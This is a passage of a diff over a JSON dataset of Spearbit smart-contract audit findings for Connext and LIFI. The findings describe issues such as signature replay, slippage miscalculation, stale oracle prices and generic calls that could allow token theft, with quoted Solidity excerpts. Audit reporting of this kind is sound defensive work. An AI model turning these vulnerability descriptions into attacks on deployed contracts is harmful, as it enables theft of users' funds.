See BridgeFacet.sol#L319-L321: if (_args.params.originDomain != s.domain) { revert BridgeFacet__xcall_wrongDomain(); }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Fee-On-Transfer tokens are not explicitly denied in swap()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The swap() function is used extensively within the Connext protocol, primarily when swapping be- tween local and adopted assets. When a swap is performed, the function will check the actual amount transferred. However, this is not consistent with other swap functions which check that the amount transferred is equal to dx. As a result, overwriting dx with tokenFrom.balanceOf(address(this)).sub(beforeBalance) allows for fee-on- transfer tokens to work as intended.", + "title": "Amount swapped not emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The events LiFiTransferStarted() and LiFiTransferCompleted() don't emit the amount after the swap (e.g. the real amount that is being bridged / transferred to the receiver). This might be useful to add. event LiFiTransferStarted( bytes32 indexed transactionId, string bridge, string bridgeData, string integrator, address referrer, address sendingAssetId, address receivingAssetId, address receiver, uint256 amount, uint256 destinationChainId, bool hasSourceSwap, bool hasDestinationCall ); event LiFiTransferCompleted( bytes32 indexed transactionId, address receivingAssetId, address receiver, uint256 amount, uint256 timestamp );", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "xcall() may erroneously overwrite prior calls to bumpTransfer()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The bumpTransfer() function allows users to increment the relayer fee on any given transferId without checking if the unique transfer identifier exists. As a result, a subsequent call to xcall() will overwrite the s.relayerFees mapping, leading to lost funds.", + "title": "Comment is not compatible with code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "On the HyphenFacet, a comment mentions that approval is given to Anyswap. However, approval is actually given to the Hyphen router. function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); if (_hyphenData.token != address(0)) { // Give Anyswap approval to bridge tokens LibAsset.maxApproveERC20(IERC20(_hyphenData.token), _hyphenData.router, _hyphenData.amount); }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "_handleExecuteLiquidity doesnt consistently check for receiveLocalOverrides", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function _handleExecuteLiquidity() initially checks for receiveLocal but does not check for receiveLocalOverrides. Later on it does check for both of values. function _handleExecuteLiquidity(... ) ... { ...
if ( !_args.params.receiveLocal && // doesn't check for receiveLocalOverrides s.routerBalances[_args.routers[0]][_args.local] < toSwap && s.aavePool != address(0) ) { ... if (_args.params.receiveLocal || s.receiveLocalOverrides[_transferId]) { // extra check return (toSwap, _args.local); } } 22 As a result, the portal may pay the bridge user in the adopted asset when they opted to override this behaviour to avoid slippage conditions outside of their boundaries, potentially leading to an unwarranted reception of funds denominated in the adopted asset.", + "title": "Move whitelist to LibSwap.swap()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function LibSwap.swap() is dangerous because it can call any function of any contract. If this is exposed to the outside (like in GenericBridgeFacet), it might enable access to transferFrom() and thus the stealing of tokens. Also see issue \"Too generic calls in GenericBridgeFacet allow stealing of tokens\". Luckily, most of the time LibSwap.swap() is called via _executeSwaps(), which has a whitelist and reduces the risk. To improve security, it would be better to integrate the whitelists in LibSwap.swap(). Note: also see issue \"_executeSwaps of Executor.sol doesn't have a whitelist\" library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { if (!LibAsset.isContract(_swapData.callTo)) revert InvalidContract(); ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue }(_swapData.callData); ... } } contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Router signatures can be replayed when executing messages on the destination domain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Connext bridge supports near-instant transfers by allowing users to pay a small fee to routers for providing them with liquidity. Gelato relayers are tasked with taking in bids from liquidity providers who sign a message consisting of the transferId and path length. The path length variable only guarantees that the message they signed will only be valid if _args.routers.length - 1 routers are also selected. However, it does not prevent Gelato relayers from re-using the same signature multiple times. As a result, routers may unintentionally provide more liquidity than expected.", + "title": "Redundant check on the HyphenFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the HyphenFacet, there is a condition which checks that the source chain id is different from the destination chain id. However, the same check is already present in the Hyphen contracts
(_depositErc20, _depositNative). function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "diamondCut() allows re-execution of old updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function diamondCut() of LibDiamond verifies the signed version of the update parameters. It checks the signed version is available and a sufficient amount of time has passed. However it doesnt prevent multiple executions and the signed version stays valid forever. This allows old updates to be executed again. Assume the following: facet_x (or function_y) has value: version_1. then: replace facet_x (or function_y) with version_2. then a bug is found in version_2 and it is rolled back with: replace facet_x (or function_y) with ver- sion_1. 23 then a (malicious) owner could immediately do: replace facet_x (or function_y) with version_2 (be- cause it is still valid). Note: the risk is limited because it can only executed by the contract owner, however this is probably not how the mechanism should work. library LibDiamond { function diamondCut(...) ... { ... uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, \"LibDiamond: delay not elapsed\"); ... } }", + "title": "Check input amount equals swapped amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The bridge functions don't check that the input amount (_bridgeData.amount or msg.value) is equal to the swapped amount (_swapData[0].fromAmount). This could lead to funds remaining in the LiFi Diamond or Executor. Luckily, noLeftovers() or checks on startingBalance solve this by sending the remaining balance to the originator or receiver. However, this is fixing symptoms instead of preventing the issue. function swapAndStartBridgeTokensViaOmniBridge( ... LibSwap.SwapData[] calldata _swapData, BridgeData calldata _bridgeData ) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Not always safeApprove(..., 0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Some functions like _reconcileProcessPortal of BaseConnextFacet and _swapAssetOut of As- setLogic do safeApprove(..., 0) first. contract NomadFacet is BaseConnextFacet { function _reconcileProcessPortal( ... ) ... { ... // Edge case with some tokens: Example USDT in ETH Mainnet, after the backUnbacked call there ,! could be a remaining allowance if not the whole amount is pulled by aave. // Later, if we try to increase the allowance it will fail. USDT demands if allowance is not 0, ,! it has to be set to 0 first. // Example: ,! ,! [ParaSwapRepayAdapter.sol#L138-L140](https://github.com/aave/aave-v3-periphery/blob/ca184e5278bcbc1 0d28c3dbbc604041d7cfac50b/contracts/adapters/paraswap/ParaSwapRepayAdapter.sol#L138-L140) c SafeERC20.safeApprove(IERC20(adopted), s.aavePool, 0); SafeERC20.safeIncreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); ... } } While the following functions dont do this: xcall of BridgeFacet.
_backLoan of PortalFacet. _swapAsset of AssetLogic. execute of Executor. This could result in problems with tokens like USDT. 24 contract BridgeFacet is BaseConnextFacet { ,! function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { ... SafeERC20.safeIncreaseAllowance(IERC20(bridged), address(s.bridgeRouter), bridgedAmt); ... } } contract PortalFacet is BaseConnextFacet { function _backLoan(...) ... { ... SafeERC20Upgradeable.safeIncreaseAllowance(IERC20Upgradeable(_asset), s.aavePool, _backing + ,! _fee); ... } } library AssetLogic { function _swapAsset(...) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); ... } } contract Executor is IExecutor { function execute( ... ) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... } }", + "title": "Use same layout for facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The different bridge facets use different layouts for the source code. This can be seen at the call to _startBridge(). The code is easier to maintain if it is the same everywhere. AmarokFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true); ArbitrumBridgeFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true); OmniBridgeFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true); OptimismBridgeFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true); PolygonBridgeFacet.sol: _startBridge(_lifiData, _bridgeData, true); StargateFacet.sol: _startBridge(_stargateData, _lifiData, nativeFee, true); AcrossFacet.sol: _startBridge(_acrossData); CBridgeFacet.sol: _startBridge(_cBridgeData); GenericBridgeFacet.sol: _startBridge(_bridgeData); GnosisBridgeFacet.sol: _startBridge(gnosisBridgeData); HopFacet.sol: _startBridge(_hopData); HyphenFacet.sol: _startBridge(_hyphenData); NXTPFacet.sol: _startBridge(_nxtpData); AnyswapFacet.sol: _startBridge(_anyswapData, underlyingToken, isNative); WormholeFacet.sol: _startBridge(_wormholeData); AxelarFacet.sol: // no _startBridge", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "_slippageTol does not adjust for decimal differences", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Users set the slippage tolerance in percentage. The assetLogic calculates: minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR Then assetLogic uses minReceived in the swap functions. The minReceived, however, does not adjust for the decimal differences between assetIn and assetOut. Users will either always hit the slippage or suffer huge slippage when assetIn and assetOut have a different number of decimals. Assume the number of decimals of assetIn is 6 and the decimal of assetOut is 18. The minReceived will be set to 10-12 smaller than the correct value. Users would be vulnerable to sandwich attacks in this case. Assume the number of decimals of assetIn is 18 and the number of decimals of assetOut is 6. The minReceived will be set to 1012 larger than the correct value. Users would always hit the slippage and the cross-chain transfer will get stuck. 25 library AssetLogic { function _swapAsset(... ) ... { // Swap the asset to the proper local asset uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR; ...
return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut); ... } }", + "title": "Safety check is missing on the remaining amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "On the FeeCollector contract, there is no safety check to ensure the remaining amount doesn't underflow and revert. function collectNativeFees( uint256 integratorFee, uint256 lifiFee, address integratorAddress ) external payable { uint256 remaining = msg.value - (integratorFee + lifiFee); ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Canonical assets should be keyed on the hash of domain and id", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "A canonical asset is a tuple of a (domain, id) pair. TokenRegistrys owner has the power to regis- ter new tokens in the system (See TokenRegistry.ensureLocalToken() and TokenRegistry.enrollCustom()). A canonical asset is registered using the hash of its domain and id (See TokenRegistry._setCanonicalToRepre- sentation()). Connext uses only the id of a canonical asset to uniquely identify. Here are a few references: swapStorages canonicalToAdopted It is an issue if TokenRegistry registers two canonical assets with the same id. canonical asset an unintended one might be transferred to the destination chain, of the transfers may revert. If this id fetches the incorrect", + "title": "Entire struct can be emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The emit LiFiTransferStarted() generally outputs the entire struct _lifiData by specifying all fields of the struct. It's also possible to emit the entire struct in one go. This would make the code smaller and easier to maintain. function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, \"omni\", \"\", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); }", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Missing checks for Chainlink oracle", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "ConnextPriceOracle.getTokenPrice() function goes through a series of oracles. At each step, it has a few validations to avoid incorrect price. If such validations succeed, the function returns the non-zero oracle price. For the Chainlink oracle, getTokenPrice() ultimately calls getPriceFromChainlink() which has the following validation if (answer == 0 || answeredInRound < roundId || updateAt == 0) { // answeredInRound > roundId ===> ChainLink Error: Stale price // updatedAt = 0 ===> ChainLink Error: Round not complete return 0; } updateAt refers to the timestamp of the round. This value isnt checked to make sure it is recent. 26 Additionally, it is important to be aware of the minAnswer and maxAnswer of the Chainlink oracle, these values are not allowed to be reached or surpassed.
See Chainlink API reference for documentation on minAnswer and maxAnswer as well as this piece of code: OffchainAggregator.sol", + "title": "Redundant return value from internal function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Callers of the NXTPFacet._startBridge() function never use its return value.", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Same params.SlippageTol is used in two different swaps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The Connext protocol does a cross-chain transfer with the help of the Nomad protocol. to use the Nomad protocol, Connext has to convert the adopted token into the local token. For a cross-chain transfer, users take up two swaps. Adopted -> Local at the source chain and Local -> Adopted at the destination chain. BridgeFacet.sol#L299-L304 function xcall(XCallArgs calldata _args) external payable whenNotPaused nonReentrant returns (bytes32) { ... // Swap to the local asset from adopted if applicable. (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( canonical, transactingAssetId, amount, _args.params.slippageTol ); ... } BridgeFacet.sol#L637 function _handleExecuteLiquidity( bytes32 _transferId, bytes32 _canonicalId, bool _isFast, ExecuteArgs calldata _args ) private returns (uint256, address) { ... // swap out of mad* asset into adopted asset if needed return AssetLogic.swapFromLocalAssetIfNeeded(_canonicalId, _args.local, toSwap, _args.params.slippageTol); ,! } The same slippage tolerance _args.params.slippageTol is used in two swaps. In most cases users cannot set the correct slippage tolerance to protect two swaps. Assume the Nomad asset is slightly cheaper in both chains. 1 Nomad asset equals 1.01 adopted asset. An expected swap would be:1 adopted -> 1.01 Nomad asset -> 1 adopted. The right slippage tolerance should be set at 1.01 and 0.98 respectively. Users cannot set the correct tolerance with a single parameter. This makes users vulnerable to MEV searchers. Also, user transfers get stuck during periods of instability.", + "title": "Change comment on the LibAsset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The following comment is used in the LibAsset.sol contract. However, Connext doesn't have this file anymore; it was deleted with the following commit. /// @title LibAsset /// @author Connext /// @notice This library contains helpers for dealing with onchain transfers of assets, including accounting for the native asset `assetId` conventions and any noncompliant ERC20 transfers library LibAsset {}", "labels": [ "Spearbit", - "Connext", - "Severity: Medium Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "getTokenPrice() returns stale token prices", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "getTokenPrice() reads from the assetPrices[tokenAddress].price mapping which stores the latest price as configured by the protocol admin in setDirectPrice(). However, the check for a stale token price will never fallback to other price oracles as tokenPrice != 0.
Therefore, the stale token price will be unintentionally returned.", + "title": "Integrate all variants of _executeAndCheckSwaps()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are multiple functions that are more or less the same: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol _executeAndCheckSwaps() of SwapperV2.sol _executeAndCheckSwaps() of Swapper.sol swapAndCompleteBridgeTokens() of XChainExecFacet As these are important functions, it is worth the trouble to have one code base to maintain. For example, swapAndCompleteBridgeTokens() doesn't check msg.value == 0 when ERC20 tokens are sent. Note: swapAndCompleteBridgeTokensViaStargate() of StargateFacet.sol already uses SwapperV2.sol", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Potential division by zero if gas token oracle is faulty", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "In the event that the gas token oracle is faulty and returns malformed values, the call to reim- burseRelayerFees() in _handleExecuteTransaction() will fail. Fortunately, the low-level call() function will not prevent the transfer from being executed, however, this may lead to further issues down the line if changes are made to the sponsor vault.", + "title": "Utilize NATIVE_ASSETID constant from LibAsset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the codebase, the LibAsset library contains a variable which defines the zero address. However, on the facets the check is repeated. Code should not be repeated, and it's better to have one version used everywhere to reduce the likelihood of bugs. contract AcrossFacet { address internal constant ZERO_ADDRESS = 0x0000000000000000000000000000000000000000; } contract DexManagerFacet { if (_dex == 0x0000000000000000000000000000000000000000) } contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; ... } address sendTo = (_to == address(0)) ? msg.sender : _to;", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Burn does not lower allowance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function _takeTokens() of BridgeRouter takes in the tokens from the sender. Sometimes it transfers them and sometimes it burns them. In the case of burning the tokens, the allowance isnt \"used up\". 28 function _takeTokens(... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... IERC20(_token).safeTransferFrom(msg.sender, address(this), _amount); ... } else { ... _t.burn(msg.sender, _amount); ... } ... // doesn't use up the allowance } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function burn(address _from, uint256 _amnt) external override onlyOwner { _burn(_from, _amnt); } }", + "title": "Native matic will be treated as ERC20 token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "LiFi supports Polygon in its implementation. However, native MATIC on Polygon has the contract address 0x0000000000000000000000000000000000001010.
Even if it does not pose any risk, native MATIC will be treated as an ERC20 token. contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; // address(0) ...", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Two step ownership transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function setAdmin() transfer ownership to a new address. In case a wrong address is supplied ownership is inaccessible. The same issue occurs with transferOwnership of OwnableUpgradeable in several Nomad contracts. Additionally the Nomad contract try to prevent renounceOwnership, however, this can also be accomplished with transferOwnership to a non existing address. Relevant Nomad contracts: TokenRegistry.sol NomadBase.sol UpdaterManager.sol XAppConnectionManager.sol 29 contract ConnextPriceOracle is PriceOracle { ... function setAdmin(address newAdmin) external onlyAdmin { address oldAdmin = admin; admin = newAdmin; emit NewAdmin(oldAdmin, newAdmin); } } contract BridgeRouter is Version0, Router { ... /** * @dev should be impossible to renounce ownership; * * */ we override OpenZeppelin OwnableUpgradeable's implementation of renounceOwnership to make it a no-op function renounceOwnership() public override onlyOwner { // do nothing } }", + "title": "Multiple versions of noLeftovers modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The modifier noLeftovers is defined in 3 different files: Swapper.sol, SwapperV2.sol and Executor.sol. While the versions in Swapper.sol and Executor.sol are the same, they differ from the one in SwapperV2.sol. Assuming the recommendation for \"Processing of end balances\" is followed, the only difference is that noLeftovers in SwapperV2.sol doesn't revert when the new balance is less than the initial balance. Code should not be repeated, and it's better to have one version used everywhere to reduce the likelihood of bugs.", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Function removeRouter does not clear approvedForPortalRouters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function removeRouter() clears most of the fields of the struct RouterPermissionsManagerInfo except for approvedForPortalRouters. However, it is still good to also remove approvedForPortalRouters in removeRouter() because if the router were to be added again later (via setupRouter() ) or _isRouterOwnershipRenounced is set in the future, the router would still have the old approvedForPortalRouters. 30 struct RouterPermissionsManagerInfo { mapping(address => bool) approvedRouters; // deleted mapping(address => bool) approvedForPortalRouters; // not deleted mapping(address => address) routerRecipients; // deleted mapping(address => address) routerOwners; // deleted mapping(address => address) proposedRouterOwners; // deleted mapping(address => uint256) proposedRouterTimestamp; // deleted } contract RoutersFacet is BaseConnextFacet { function removeRouter(address router) external onlyOwner { ... s.routerPermissionInfo.approvedRouters[router] = false; ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ...
delete s.routerPermissionInfo.proposedRouterOwners[router]; delete s.routerPermissionInfo.proposedRouterTimestamp[router]; } }", + "title": "Reduce unchecked scope", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Both zapIn() functions in FusePoolZap.sol operate in an unchecked block, which means any contained arithmetic can underflow or overflow. Currently, it affects only one line in both functions: FusePoolZap.sol#L67: uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)) - preMintBalance; FusePoolZap.sol#L104: mintAmount = mintAmount - preMintBalance; Having unchecked for such a large scope when it is applicable to only one line is dangerous.", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Anyone can self burn lp token of the AMM", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When providing liquidity into the AMM pool, users get LP tokens. Users can redeem their shares of the liquidity by redeeming LP to the AMM pool. The current LPToken contract inherits Openzepplins ERC20BurnableUpgradeable. Users can burn their tokens by calling burn without notifying the AMM pools. ERC20BurnableUpgradeable.sol#L26-L28. Although users do not profit from this action, it brings up concerns such as: An exploiter has an easy way to pump the LP price. Burning LP is similar to donating value to the pool. While its good for the pool, this gives the exploiter another tool to break other protocols. After the cream finance attack many protocols started to take extra caution and made this a restricted function (absorbing donation) github.com/yearn/yearn-security/blob/master/disclosures/2021-10-27.md. Against the best practice. Every state of an AMM is related to price. Allowing external actors to change the AMM states without notifying the main contract is dangerous. Its also harder for a developer to build other novel AMM based on the same architecture. Note: the burn function is also not protected by nonReentrant or whenNotPaused.", + "title": "No event exists for core paths/functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several key actions are defined without event declarations. Owner-only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces. There are 4 instances of this issue: contract PeripheryRegistryFacet { function registerPeripheryContract(...) ... { } } contract LibAccess { function addAccess(...) ... { } function removeAccess(...) ... { } } contract AccessManagerFacet { function setCanExecute(...) ... { } }", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Skip timeout in diamondCut() (edge case)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Edge case: If someone manages to get an update through which deletes all facets then the next update skips the delay (because ds.facetAddresses.length will be 0). library LibDiamond { function diamondCut(...) ... { ...
if (ds.facetAddresses.length != 0) { uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, \"LibDiamond: delay not elapsed\"); } // Otherwise, this is the first instance of deployment and it can be set automatically ... } }", + "title": "Rename _receiver to _leftoverReceiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the contracts Swapper.sol, SwapperV2.sol and Executor.sol, the parameter _receiver is used in various places. Its name seems to suggest that the result of the swapped tokens is sent to the _receiver; however, this is not the case. Instead, the leftover tokens are sent to the _receiver. This makes the code more difficult to read and maintain. contract SwapperV2 is ILiFi { modifier noLeftovers(..., address payable _receiver) { ... } function _executeAndCheckSwaps(..., address payable _receiver) ... { ... } function _executeSwaps(..., address payable _receiver) ... { ... } }", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Limit gas for s.executor.execute()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The call to s.executor.execute() in BridgeFacet might use up all available gas. In that case, the call to callback to report to the originator might not be called because the execution stops due an out of gas error. Note: the execute() function might be retried by the relayer so perhaps this will fix itself eventually. Note: excessivelySafeCall in Executor does limit the amount of gas. contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory returnData) = s.executor.execute(...); // might use all available ,! gas ... // If callback address is not zero, send on the PromiseRouter if (_args.params.callback != address(0)) { s.promiseRouter.send(...); // might not have enough gas } ... } }", + "title": "Native tokens don't need SwapData.approveTo", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. These checks also include a check on approveTo; however, approveTo is not relevant when a native token is being used. Currently, the caller of the LiFi Diamond has to specify a whitelisted currentSwapData.approveTo to be able to execute _executeSwaps(), which doesn't seem logical. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } }", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Several external functions missing whenNotPaused mofifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The following functions dont have a whenNotPaused modifier while most other external functions do. bumpTransfer of BridgeFacet. forceReceiveLocal of BridgeFacet.
repayAavePortal of PortalFacet. repayAavePortalFor of PortalFacet. Without whenNotPaused these functions can still be executed when the protocol is paused.", + "title": "Inaccurate comment on the maxApproveERC20() function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, it has been observed that the comment is incompatible with the functionality. The maxApproveERC20 function approves MAX if the asset id does not have a sufficient allowance. The comment can be replaced with: If a sufficient allowance is not present, the allowance is set to MAX. /// @notice Gives MAX approval for another address to spend tokens /// @param assetId Token address to transfer /// @param spender Address to give spend approval to /// @param amount Amount to approve for spending function maxApproveERC20( IERC20 assetId, address spender, uint256 amount )", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Gas griefing attack on callback execution", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When the callback is executed on the source chain the following line can revert or consume all forwarded gas. In this case, the relayer wastes gas and doesnt get the callback fee. ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData());", + "title": "Undocumented contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "All systematic contracts are documented in the docs directory. However, several contracts are not documented. LiFi is integrated with third-party platforms through an API. To understand the code's functionality, the related contracts should be documented in the directory.", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Callback fails when returnData is empty", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "If a transfer involves a callback, PromiseRouter reverts if returnData is empty. if (_returnData.length == 0) revert PromiseRouter__send_returndataEmpty(); However, the callback should be allowed in case the user wants to report the calldata execution success on the destination chain (_returnSuccess).", + "title": "Utilize built-in library function on the address check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the codebase, the LibAsset library contains a function which determines whether the given assetId is the native asset. However, this check is not used, and many of the other contracts apply the address check separately. contract 